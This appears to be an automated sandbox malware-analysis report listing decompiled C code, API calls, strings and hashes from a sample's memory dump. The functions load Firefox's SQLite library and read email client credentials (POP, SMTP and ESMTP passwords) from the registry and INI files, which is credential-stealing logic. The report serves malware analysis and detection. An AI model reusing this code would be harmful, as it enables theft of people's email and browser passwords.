                                                                                              • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                              • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                              • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                              • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}













                                                                                              0x0040f64b
                                                                                              0x0040f65b
                                                                                              0x0040f7e1
                                                                                              0x00000000
                                                                                              0x0040f7e3
                                                                                              0x0040f66e
                                                                                              0x0040f674
                                                                                              0x0040f685
                                                                                              0x0040f694
                                                                                              0x0040f687
                                                                                              0x0040f68b
                                                                                              0x0040f691
                                                                                              0x0040f69f
                                                                                              0x0040f741
                                                                                              0x0040f747
                                                                                              0x0040f74f
                                                                                              0x0040f752
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040f755
                                                                                              0x00000000
                                                                                              0x0040f6a5
                                                                                              0x0040f6b2
                                                                                              0x0040f6b8
                                                                                              0x0040f6cb
                                                                                              0x0040f6dc
                                                                                              0x0040f6f2
                                                                                              0x0040f702
                                                                                              0x0040f713
                                                                                              0x0040f718
                                                                                              0x0040f722
                                                                                              0x0040f72a
                                                                                              0x0040f72d
                                                                                              0x0040f75e
                                                                                              0x0040f75e
                                                                                              0x0040f763
                                                                                              0x00000000
                                                                                              0x0040f7ea
                                                                                              0x0040f77f
                                                                                              0x0040f78b
                                                                                              0x0040f798
                                                                                              0x0040f7a5
                                                                                              0x0040f7b2
                                                                                              0x0040f7bf
                                                                                              0x0040f7cc
                                                                                              0x0040f7d9
                                                                                              0x0040f7de
                                                                                              0x00000000
                                                                                              0x0040f72f
                                                                                              0x0040f739
                                                                                              0x0040f75b
                                                                                              0x0040f75b
                                                                                              0x00000000
                                                                                              0x0040f75b
                                                                                              0x0040f72d

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F674
                                                                                              • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                              • memset.MSVCRT ref: 0040F6B8
                                                                                              • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                              • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                              • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                              • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                              • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                              • API String ID: 3567885941-2042458128
                                                                                              • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                              • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                              • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                              • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402D9A, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040EB3F(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E004021D8( &_v1872);
					E004021D8( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040EB80(_t122, _t113);
					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040EB59(_t113, _a8, "PopPort",  &_v24);
					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401D18( &_v280, _t116);
					}
					if(_v408 != 0) {
						E00402407( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401D18( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E00402407( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                                              0x00402d9a
                                                                                              0x00402d9a
                                                                                              0x00402d9a
                                                                                              0x00402dad
                                                                                              0x00402db7
                                                                                              0x00402dc0
                                                                                              0x00402dc7
                                                                                              0x00402dca
                                                                                              0x00402dcd
                                                                                              0x00402dd8
                                                                                              0x00402ddf
                                                                                              0x00402de0
                                                                                              0x00402de6
                                                                                              0x00402df2
                                                                                              0x00402df3
                                                                                              0x00402df8
                                                                                              0x00402dfb
                                                                                              0x00402e07
                                                                                              0x00402e0a
                                                                                              0x00402e14
                                                                                              0x00402e2a
                                                                                              0x00402e40
                                                                                              0x00402e56
                                                                                              0x00402e67
                                                                                              0x00402e78
                                                                                              0x00402e9d
                                                                                              0x00402e9f
                                                                                              0x00402e9f
                                                                                              0x00402eb1
                                                                                              0x00402ec4
                                                                                              0x00402eda
                                                                                              0x00402ef0
                                                                                              0x00402f04
                                                                                              0x00402f18
                                                                                              0x00402f3d
                                                                                              0x00402f3f
                                                                                              0x00402f3f
                                                                                              0x00402f43
                                                                                              0x00402f51
                                                                                              0x00402f5e
                                                                                              0x00402f63
                                                                                              0x00402f6c
                                                                                              0x00402f74
                                                                                              0x00402f74
                                                                                              0x00402f80
                                                                                              0x00402f89
                                                                                              0x00402f89
                                                                                              0x00402f8e
                                                                                              0x00402f93
                                                                                              0x00402f9b
                                                                                              0x00402f9b
                                                                                              0x00402fa7
                                                                                              0x00402fb0
                                                                                              0x00402fb0
                                                                                              0x00000000
                                                                                              0x00402fb8
                                                                                              0x00402fbf

                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                              • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                              • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$QueryValue$CloseOpen
                                                                                              • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                              • API String ID: 4127491968-1534328989
                                                                                              • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                              • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                              • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                              • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004033D7, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
				void* __esi;
				intOrPtr _t23;
				void* _t35;

				_t48 = __fp0;
				E004021D8( &_v936);
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E004033B8( &_v276);
					_t35 = E00402407( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}


















                                                                                              0x004033d7
                                                                                              0x004033e7
                                                                                              0x004033f2
                                                                                              0x004033f9
                                                                                              0x004033fa
                                                                                              0x00403400
                                                                                              0x00403406
                                                                                              0x00403419
                                                                                              0x00403423
                                                                                              0x00403435
                                                                                              0x00403447
                                                                                              0x00403459
                                                                                              0x0040346b
                                                                                              0x0040347d
                                                                                              0x00403489
                                                                                              0x00403491
                                                                                              0x0040349f
                                                                                              0x0040349f
                                                                                              0x004034ab
                                                                                              0x004034b3
                                                                                              0x00000000
                                                                                              0x004034c1
                                                                                              0x004034c8

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                              • API String ID: 3963849919-1658304561
                                                                                              • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                              • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                              • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                              • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 99%
                                                                                              			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}



















































































































































                                                                                              0x0040f813
                                                                                              0x0040f81a
                                                                                              0x0040f821
                                                                                              0x0040f828
                                                                                              0x0040f82f
                                                                                              0x0040f836
                                                                                              0x0040f83d
                                                                                              0x0040f841
                                                                                              0x0040f845
                                                                                              0x0040f849
                                                                                              0x0040f84d
                                                                                              0x0040f851
                                                                                              0x0040f855
                                                                                              0x0040f85f
                                                                                              0x0040f869
                                                                                              0x0040f873
                                                                                              0x0040f87d
                                                                                              0x0040f887
                                                                                              0x0040f891
                                                                                              0x0040f89b
                                                                                              0x0040f8a5
                                                                                              0x0040f8af
                                                                                              0x0040f8b9
                                                                                              0x0040f8c3
                                                                                              0x0040f8cd
                                                                                              0x0040f8d7
                                                                                              0x0040f8e1
                                                                                              0x0040f8eb
                                                                                              0x0040f8f5
                                                                                              0x0040f8ff
                                                                                              0x0040f909
                                                                                              0x0040f913
                                                                                              0x0040f91d
                                                                                              0x0040f927
                                                                                              0x0040f931
                                                                                              0x0040f93b
                                                                                              0x0040f945
                                                                                              0x0040f94f
                                                                                              0x0040f959
                                                                                              0x0040f963
                                                                                              0x0040f96d
                                                                                              0x0040f977
                                                                                              0x0040f981
                                                                                              0x0040f98b
                                                                                              0x0040f995
                                                                                              0x0040f99f
                                                                                              0x0040f9a9
                                                                                              0x0040f9b3
                                                                                              0x0040f9bd
                                                                                              0x0040f9c7
                                                                                              0x0040f9d1
                                                                                              0x0040f9db
                                                                                              0x0040f9e5
                                                                                              0x0040f9ef
                                                                                              0x0040f9f9
                                                                                              0x0040fa03
                                                                                              0x0040fa0d
                                                                                              0x0040fa17
                                                                                              0x0040fa21
                                                                                              0x0040fa2b
                                                                                              0x0040fa35
                                                                                              0x0040fa3f
                                                                                              0x0040fa49
                                                                                              0x0040fa53
                                                                                              0x0040fa5d
                                                                                              0x0040fa67
                                                                                              0x0040fa71
                                                                                              0x0040fa7b
                                                                                              0x0040fa85
                                                                                              0x0040fa8f
                                                                                              0x0040fa99
                                                                                              0x0040faa3
                                                                                              0x0040faad
                                                                                              0x0040fab7
                                                                                              0x0040fac1
                                                                                              0x0040facb
                                                                                              0x0040fad5
                                                                                              0x0040fadf
                                                                                              0x0040fae9
                                                                                              0x0040faf3
                                                                                              0x0040faf6
                                                                                              0x0040fafa
                                                                                              0x0040fafc
                                                                                              0x0040fb00
                                                                                              0x0040fb0a
                                                                                              0x0040fb14
                                                                                              0x0040fb1e
                                                                                              0x0040fb28
                                                                                              0x0040fb32
                                                                                              0x0040fb3c
                                                                                              0x0040fb46
                                                                                              0x0040fb50
                                                                                              0x0040fb5a
                                                                                              0x0040fb64
                                                                                              0x0040fb6e
                                                                                              0x0040fb78
                                                                                              0x0040fb82
                                                                                              0x0040fb8c
                                                                                              0x0040fb96
                                                                                              0x0040fba0
                                                                                              0x0040fbaa
                                                                                              0x0040fbb1
                                                                                              0x0040fbb8
